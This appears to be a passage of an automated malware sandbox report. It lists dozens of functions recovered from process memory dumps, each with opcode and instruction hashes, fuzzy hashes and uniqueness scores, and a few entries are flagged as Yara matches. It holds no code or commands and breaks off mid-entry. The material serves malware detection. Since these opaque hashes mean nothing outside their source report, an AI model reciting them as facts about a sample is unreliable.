                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d54b297360235a3b1b075d61d06e1b264c707657378be219604ee92ea4b87c37
                    • Instruction ID: 0cafd76b6d71c2188f65ef73deefc7801ffdfaea7cd22ea1a39b1e6c78b78d5c
                    • Opcode Fuzzy Hash: d54b297360235a3b1b075d61d06e1b264c707657378be219604ee92ea4b87c37
                    • Instruction Fuzzy Hash: 8C0184712015467FD351BB7ACD90E5BB7ACFB65660B00022FF9188BA21CB34EC11C6E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0152138A, Relevance: .0, Instructions: 48COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 926b0815d186635696fe9e906f4a1e732fd532653e8af0599f885881046f7969
                    • Instruction ID: 0296059ea30bc8eb8db61b228dff4c36cf5f30d28760198b52d060ca031be7f8
                    • Opcode Fuzzy Hash: 926b0815d186635696fe9e906f4a1e732fd532653e8af0599f885881046f7969
                    • Instruction Fuzzy Hash: 65019271A00219AFCB10DFA9D881EAEBBB8EF64700F41405BF904EB290D6709A01C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 015214FB, Relevance: .0, Instructions: 48COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 62dc74b7ff75995ff7e7a1de5fe459da09b1746c2b9c9d25f590136b54d94d19
                    • Instruction ID: 2e1eaa9653369e65cf2520d1b07992594b657e2f9593412c634ac81addaf2d8c
                    • Opcode Fuzzy Hash: 62dc74b7ff75995ff7e7a1de5fe459da09b1746c2b9c9d25f590136b54d94d19
                    • Instruction Fuzzy Hash: D3019271A00259AFCB10DFA9D841EAEBBB8EF55700F41405BF914EB290D670DA00CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014658EC, Relevance: .0, Instructions: 47COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9408e326c4ac4924824cb0b6105d00200741e03454b530a20daf8772640cf0cd
                    • Instruction ID: e691a7d0ce437459a812fd90c73f3ba67de81db3084a167aff79980e2db035ef
                    • Opcode Fuzzy Hash: 9408e326c4ac4924824cb0b6105d00200741e03454b530a20daf8772640cf0cd
                    • Instruction Fuzzy Hash: 31012431A001059BDB10EE6AD8149AF77ACEB51174F8500AB99059F360DE30ED0AC391
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01531074, Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eb3479d68715eb2106ec24247e9ddce572b87841a7368c25cd61309e3f74245e
                    • Instruction ID: 6a746e41cf7918aaa30cca7cf0d30587be7277843c14a39fbe9377f7fa9dda08
                    • Opcode Fuzzy Hash: eb3479d68715eb2106ec24247e9ddce572b87841a7368c25cd61309e3f74245e
                    • Instruction Fuzzy Hash: 00012872604B429FC711EF79C940B1EBBD5BBD4310F048A19F9958B690EE30D545CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0147B02A, Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                    • Instruction ID: 742298fa093ec385c359816a3ded3cdf914278d9351a62129fa5cfc77a449d78
                    • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                    • Instruction Fuzzy Hash: FD015EB22005849FE323875DC948FA77BD8EB96A50F1940A6AA19CB772E638DC41C660
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0151FE3F, Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 40f300947d99b6b7ecd82fd86e23c3023abecd7ec709a9d5118ad264690a80db
                    • Instruction ID: dd38d7519c0157fa6fd88f3a0227bfdaddd24f77dd33017419362acf4f390b21
                    • Opcode Fuzzy Hash: 40f300947d99b6b7ecd82fd86e23c3023abecd7ec709a9d5118ad264690a80db
                    • Instruction Fuzzy Hash: D601D471A00209AFDB14DFA9D811FAEBBB8EF60700F01406BB900AB291DA309901C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0151FEC0, Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 55eff4c614e2c4d9958ded62c12b69f79a847d1b7aa2a48a0189106713abe026
                    • Instruction ID: 4b5b022e5f5a6a950cdba4d3189a7e11042417777f8aaa38a2135ba3fe17ea07
                    • Opcode Fuzzy Hash: 55eff4c614e2c4d9958ded62c12b69f79a847d1b7aa2a48a0189106713abe026
                    • Instruction Fuzzy Hash: F6018471A00219ABDB14DFA9D855FAEBBB8EF64700F41406BB910AB290DA709A05CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01538A62, Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3abeb6f8432e089b197cb5a075ca6d1b967aa303a9a55e0c00f79a30a2925dbc
                    • Instruction ID: 8b068c8fe0ad9c61b60b7309702cd3ef55db9a5c127742a2ee195aa1db63e53d
                    • Opcode Fuzzy Hash: 3abeb6f8432e089b197cb5a075ca6d1b967aa303a9a55e0c00f79a30a2925dbc
                    • Instruction Fuzzy Hash: 1A012C71A0021DAFCB04DFA9D9519AEBBF8FF58310F55405AF905EB351D674A901CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01538ED6, Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a36002193f318ac1f8a786eeef108c60d5301d54565ed8bd0ade335421e8b5b8
                    • Instruction ID: d85337a11f871f21ee9b1a3ca9523a9bfaeb6371b5f3bddef7568cd9221adfa8
                    • Opcode Fuzzy Hash: a36002193f318ac1f8a786eeef108c60d5301d54565ed8bd0ade335421e8b5b8
                    • Instruction Fuzzy Hash: 49111E71A0025A9FDB04DFA9D551BAEBBF4FF18300F5442AAE518EB382E6349940CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0146DB60, Relevance: .0, Instructions: 43COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                    • Instruction ID: b418393d09ee55a0018fdb958b1530fd5040796820b82ac86ea71ffa383119ca
                    • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                    • Instruction Fuzzy Hash: 22F0F2337015239BD3326ADA4490F17B69DCFE2D54F19003BF2455B36CC9708C0286D2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0146B1E1, Relevance: .0, Instructions: 42COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                    • Instruction ID: 64f44ee9aed3c55b42eb925a734870cfd54214c8b2a1b98d819ecafca7cbca65
                    • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                    • Instruction Fuzzy Hash: B5016D36300A80EBD322975EC918B6A7BD9EF51B54F0940A7EA14CB7B2D679C8018215
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014FFE87, Relevance: .0, Instructions: 38COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: be5adf3b67f64a0892898f5a829f0d5f23ab5018058ae69ba1e4a94cced7ed28
                    • Instruction ID: dc0a06bf79a5a0337e95cabf5b7ec9b57cb110f9e13168d889efa0e8f1712cad
                    • Opcode Fuzzy Hash: be5adf3b67f64a0892898f5a829f0d5f23ab5018058ae69ba1e4a94cced7ed28
                    • Instruction Fuzzy Hash: 9D016271A00209EFCB14DFA9D551A6EB7F4EF14704F50419EA914DB392D635D906CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0152131B, Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 10ef6419b8a1e6598c9490bb26ad32956660ea601ae5d2ef16063891f27912b6
                    • Instruction ID: 263c8e0104b6738ebb1c95834ee192919b2100e7e07cb69a638075765e00c103
                    • Opcode Fuzzy Hash: 10ef6419b8a1e6598c9490bb26ad32956660ea601ae5d2ef16063891f27912b6
                    • Instruction Fuzzy Hash: FD018C71A00259AFCB00EFA9D545AAEB7F4FF28300F40405AF805EB391E6309A00CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01538F6A, Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5955e79d0f2b35e072df5c73d4960faa8399b3c191718548ea92726c1c59bd4d
                    • Instruction ID: 9adbbb252f4b2ea2ef7ee06f7e0b56f669892806b9167af1be9a988b3eefbf09
                    • Opcode Fuzzy Hash: 5955e79d0f2b35e072df5c73d4960faa8399b3c191718548ea92726c1c59bd4d
                    • Instruction Fuzzy Hash: 4801AF70A0020DAFCB04EFA9D545AAEB7F4FF68300F50405AB914EB390EA34DA00CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01521608, Relevance: .0, Instructions: 34COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ec5bc34bba3ea429b2849d93f3bbcfe2ec1a7840d57685d95261ebda0d3041ac
                    • Instruction ID: 9de054b90c0b4441584e0bad73ff673ca53f599c4d09c80f938ddd82acc5faec
                    • Opcode Fuzzy Hash: ec5bc34bba3ea429b2849d93f3bbcfe2ec1a7840d57685d95261ebda0d3041ac
                    • Instruction Fuzzy Hash: 33F0C271A00258EFCB10EFA9C445A6FB7F4FF24300F40406AE915EB391E6309900CB44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0148C577, Relevance: .0, Instructions: 33COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b53e7cb5ab5e5663aaf1b8f26a6373963abe6a2923b7b01536fc0d95f0e7d66
                    • Instruction ID: 79432e55cd92d8cfab36776fa1929145b9148dfc9779b234928e5c7a70841d19
                    • Opcode Fuzzy Hash: 5b53e7cb5ab5e5663aaf1b8f26a6373963abe6a2923b7b01536fc0d95f0e7d66
                    • Instruction Fuzzy Hash: 3EF090B29156B1DFEF36A71C8084BAB7FD49B45670F448467E50587732C7B4D880C270
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01522073, Relevance: .0, Instructions: 32COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1851a866df3ca629a1f50cf05f882c56b93695e95d3744329f0240b546e5d0fd
                    • Instruction ID: 773564593b1ce983788b122276ea7789f87f72dfe6ea4f3d2b142ea95e1ba656
                    • Opcode Fuzzy Hash: 1851a866df3ca629a1f50cf05f882c56b93695e95d3744329f0240b546e5d0fd
                    • Instruction Fuzzy Hash: ECF0A72F4256A64ADF336B3961213E92FD1F797110F5A0446D9601F249C53D8897DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A927A, Relevance: .0, Instructions: 32COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                    • Instruction ID: c4930aebc305eded2b187e440387f468598ae8cb41e87e13783ae6e0a0b27bb1
                    • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                    • Instruction Fuzzy Hash: 7FE02B323405016BE7119F0ACC80F47375DDFB2724F05407EB5041E252C6F5DC0887A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01538D34, Relevance: .0, Instructions: 32COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f1602fb1e4b7740f6f0b3bef4655bbf650c21214a5e8f9e33dc5512eb2520ef7
                    • Instruction ID: f330f616437b9135e9a57576bb52dbc3e9a5fdf28c6049d3e916aab96a18e879
                    • Opcode Fuzzy Hash: f1602fb1e4b7740f6f0b3bef4655bbf650c21214a5e8f9e33dc5512eb2520ef7
                    • Instruction Fuzzy Hash: 07F02E30A00608AFCB08EFB9D405B6EB7B4FF68300F50849AF905EB290EA34D900CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01538B58, Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3c04b3b35ad67ab7bf13456893af02b0babb47b360ecc45411c6498432b2d80d
                    • Instruction ID: 04a568e6f29779ecb1add8166965d76a386620a071dcd39d1d288ca9d01d6719
                    • Opcode Fuzzy Hash: 3c04b3b35ad67ab7bf13456893af02b0babb47b360ecc45411c6498432b2d80d
                    • Instruction Fuzzy Hash: 3CF0E2B0A0025AABDB04EBA9D916E6E73B4FF24300F41049ABA15DF390EA30D900C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0148746D, Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3335418409b09eab82b47e9159ff7d3fbbdbd6e3dfbe472011b42cc2755c93ea
                    • Instruction ID: 8509ae186ff4b307c76e8306e9b8d86a67eaac50e9ff49ede191d30dce790b50
                    • Opcode Fuzzy Hash: 3335418409b09eab82b47e9159ff7d3fbbdbd6e3dfbe472011b42cc2755c93ea
                    • Instruction Fuzzy Hash: E6F05934500149AACF02F76CC860BBE7FB1AF14A96F24423BD851AB271E3789801C785
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01538CD6, Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fe7b0210acc697b9a2fd2df44898a946d23aa88187b1d2619d71c04ec2204b8d
                    • Instruction ID: 52ef38c02a1c6d012cef35c067a3f17f74fa3783bb3aaaf4a3ff1d3ca5492fa3
                    • Opcode Fuzzy Hash: fe7b0210acc697b9a2fd2df44898a946d23aa88187b1d2619d71c04ec2204b8d
                    • Instruction Fuzzy Hash: 34F0E270A04209ABCB04EBB9D955E6E77B4EF68200F51059AF915EB290EA34D900C754
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01464F2E, Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d929fbe0173491220700671d5a9ea503d9adca56d1fefa7b17669c18b18584e0
                    • Instruction ID: 18e3f0af9f44ee33fa4d2ef3eb30232f1ec39a5912ef5645fda79a1dbcc58e37
                    • Opcode Fuzzy Hash: d929fbe0173491220700671d5a9ea503d9adca56d1fefa7b17669c18b18584e0
                    • Instruction Fuzzy Hash: B9F0B43D512695CFD7B1DB9CC244B13B7E4AB00A78F04456AE40587A32D734E840C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0149A44B, Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a91f2d874dcd713b4db922dd8f861faa4ee62aaf6321ff93dd095802c489fa96
                    • Instruction ID: c004b627fc2c7dfd5aecf222657db4237fe98f55a81317cfac1613ff41d46329
                    • Opcode Fuzzy Hash: a91f2d874dcd713b4db922dd8f861faa4ee62aaf6321ff93dd095802c489fa96
                    • Instruction Fuzzy Hash: 72E09272A01422ABD3219A19AC00F6B779DDBF4A51F1A403AE604D7224D638DD06C7E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0146F358, Relevance: .0, Instructions: 28COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                    • Instruction ID: cc4b48da85b70f08d749fc51e652269dc0dff91a4c84fc6560dd325406306603
                    • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                    • Instruction Fuzzy Hash: 86E0D832A40218FBDB31A6D99D05F5BBFACDB54A60F040156FA04D7560D5749D40C2D1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0147FF60, Relevance: .0, Instructions: 22COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 85aec6e9b9b57d93c74943bb631d1b8c5b55b15080f4e9cd4ca395c0cd8e451b
                    • Instruction ID: a40ce669c201fcc0ad78d841ea120dcc39a20f32f4981658a77de0ea5bf0568d
                    • Opcode Fuzzy Hash: 85aec6e9b9b57d93c74943bb631d1b8c5b55b15080f4e9cd4ca395c0cd8e451b
                    • Instruction Fuzzy Hash: 3EE0D8B0105204DFD735D759E060F56779C9B52629F19451FF0188BA22CA31D885C295
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014F41E8, Relevance: .0, Instructions: 21COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 93f9f800b9b9ecd6141a1e0884e90c0a4576bfed8eabaa104f226c245cb36e10
                    • Instruction ID: 8336f9fc6651ec1708446a93c86c82bfd8324ef536abeefa7fe1d922a4343bee
                    • Opcode Fuzzy Hash: 93f9f800b9b9ecd6141a1e0884e90c0a4576bfed8eabaa104f226c245cb36e10
                    • Instruction Fuzzy Hash: FEF01578830701CFDBB4EFBB952075536A4F764368F12456F92208B3A9CB3644A9EF11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0151D380, Relevance: .0, Instructions: 21COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                    • Instruction ID: 1708c2840e0568cb5da6bb19fe22101d0281bd1d1e813e3c754a131900a42dca
                    • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                    • Instruction Fuzzy Hash: 53E0CD31240205BBEB236E44CC00F697765EB60791F104035FD045F6A0C5759C51D6C4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E460, Relevance: .0, Instructions: 21COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 797faf0c60ab00633e8f5b1580c38a9ac3e72eb5602fb726a012436bf289b5eb
                    • Instruction ID: aea970cf3095f533016401799d892326578d4ba0d31d666ecf2fc79ee45afe47
                    • Opcode Fuzzy Hash: 797faf0c60ab00633e8f5b1580c38a9ac3e72eb5602fb726a012436bf289b5eb
                    • Instruction Fuzzy Hash: ADD0A713B11A095791245E896C82AB1FB7492A7814B5496679B0CE7142C546CC045349
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0149A185, Relevance: .0, Instructions: 20COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 166e4570179b2006f5fd4d0059e966e708955040d53df17d015227f0e9913060
                    • Instruction ID: 181748941831046a1970bb53dffbad3db5b64b3ca46a8526ce404abe6ce57b9f
                    • Opcode Fuzzy Hash: 166e4570179b2006f5fd4d0059e966e708955040d53df17d015227f0e9913060
                    • Instruction Fuzzy Hash: 80D012A11710805ACB6D67119A75B353AA2F794660F74490FF6064F5B4EA70DCD99108
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014916E0, Relevance: .0, Instructions: 17COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1fb9d21af1382593892f1d8a52c1d447930484cb7ad933619c04a7ea3e3d1ab7
                    • Instruction ID: 998918fb8edc57b29a1582e9885208eccf346cd2bdb548ed9388cfff5d0d70d8
                    • Opcode Fuzzy Hash: 1fb9d21af1382593892f1d8a52c1d447930484cb7ad933619c04a7ea3e3d1ab7
                    • Instruction Fuzzy Hash: 64D0A73124014393EF2D5B159814B193E51EBA0FA5F38005EF20F59AE0DFB4CC92E088
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407B1A, Relevance: .0, Instructions: 17COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c6b33015ef20adc88b66abf6e79c10f8c479e11dd489cda6a3070c3706e7beed
                    • Instruction ID: 67a97339fcd9ac4bba31293975eb1fe527449f7b5c7d90943ba4dcef15c770ce
                    • Opcode Fuzzy Hash: c6b33015ef20adc88b66abf6e79c10f8c479e11dd489cda6a3070c3706e7beed
                    • Instruction Fuzzy Hash: 1AC01237A8B1441ACA12A92EF4803B1F7B8A30B234F2032D3E809AB2408482E491064A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014E53CA, Relevance: .0, Instructions: 16COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                    • Instruction ID: be839d00671ccd0a67e56e46c1dd951c562f5adb68c24fdf654fa3aff91a3c6f
                    • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                    • Instruction Fuzzy Hash: D4E08C359007809BCF12EB49CA54F9EBBF9FB54B00F14004AA4086F730C634AC00CB00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0147AAB0, Relevance: .0, Instructions: 12COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                    • Instruction ID: 4d8638d7266cf21e613abc1ae907ed959837fe8c91bcefdbd76f8934a4bd1242
                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                    • Instruction Fuzzy Hash: F2D0C939352980CFD617CB0CC554B0673A4BB44B40FD504A0E500CB722E63CD944CA00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014935A1, Relevance: .0, Instructions: 12COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                    • Instruction ID: f3cb7b5dd7ce324c965dc8f38f62a0e94479ea02cefff0edc25ec27b9575da75
                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                    • Instruction Fuzzy Hash: C2D0A931401181DEEF02EF34C2187A93FB2BB1A228F5820EB800246A72C33A4A0AC600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0146DB40, Relevance: .0, Instructions: 11COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                    • Instruction ID: ac2f45604da62e336e9b01bcb0ced4ccb0c3052850db7e84b405a2c737e73853
                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                    • Instruction Fuzzy Hash: A9C08C30380A02AAEB222F20CD01B013AA4BB60F09F4800A16300EA4F0EB7CDC01E600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014EA537, Relevance: .0, Instructions: 11COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                    • Instruction ID: 2dd84c9245e07cef556fe33b592d59c7c6c543241a1ba66821fa5900009988f0
